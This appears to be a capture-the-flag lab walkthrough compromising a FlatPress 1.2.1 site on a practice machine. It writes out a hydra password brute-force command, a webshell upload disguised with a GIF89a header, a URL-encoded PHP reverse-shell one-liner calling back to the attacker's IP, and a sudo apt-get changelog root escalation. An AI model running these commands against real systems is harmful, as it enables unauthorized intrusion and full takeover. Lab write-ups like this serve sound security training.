Target IP: 192.168.250.29
Challenge Description: N/A.
Performing a port scan shows there are three TCP ports open on the target machine, as shown above.
Performing an aggressive port scan against the three open TCP ports returns the result above. By the looks of it, there are two HTTP applications: one on port 80, and another one on port 8089, as shown above. I will start enumeration with the application on port 8089, as the application name & version FlatPress fp-1.2.1 is provided.
Port 8089: HTTP
Browsing to port 8089 displays the webpage above. There is one article created by the FlatPress team; I was hoping for a user of this web application. I scanned the source-code of this application and found out the application version is 1.2.1.
Browsing to /login displays the login page shown above. I tried different default credentials such as admin:admin and root:root, but I had no luck.
Doing a Google search for flatpress 1.2.1 exploits returns the interesting Github page above. By the looks of it, this application is vulnerable to RCE but I need the credentials of this application first. I performed a directory search against this application and I did not find anything useful either.
I performed another nmap scan with the flag --script=vuln and found .gitignore directory. This contains the entries above.
Browsing to http://192.168.250.29:8089/fp-content/ contains the contents of this web application. However, I did not find anything important here either.
Using hydra and the command hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.250.29 http-post-form "/login.php:user=admin&pass=^PASS^:Password incorrect." -s 8089, I managed to bruteforce the password of the user admin. I obtained the credentials admin:password.
And bingo! I managed to gain access to the web application on port 8089 as the user admin as shown above. From previous enumeration, I found a PoC for the RCE. I will use this against the target web application.
I created the simple PHP webshell above with the name shell.php. It contains the magic bytes header GIF89a; at start to bypass the upload filters in the place.
Then I pressed the Uploader button and uploaded my shell.php webshell, as shown above.
I browsed to Media Manager and pressed the shell.php to use it.
And bingo! I can access my webshell at http://192.168.250.29:8089/fp-content/attachs/shell.php. I issued the commands ls;id;whoami and the target machine successfully executed it as shown above. Time to obtain a reverse shell connection now.
I started a listener on my machine at port 8443 to catch the reverse shell. Since the target machine is already using PHP, I used the URL-encoded PHP reverse shell code php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.237%22%2C8443%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. And I obtained a reverse shell connection on my machine at port 8443 with the session as www-data. Now I have a foothold on the target machine.
Running sudo -l shows the interesting entry above. The binary apt-get can be executed as the user root without password.
Gaining a root shell is simple. I used the command sudo apt-get changelog apt first. This opens the changelog documentation. Then I entered the command !/bin/sh to spawn a root shell. Now I have a root shell on the target machine, as shown above.
There is only one flag on the machine: proof.txt flag, as shown above.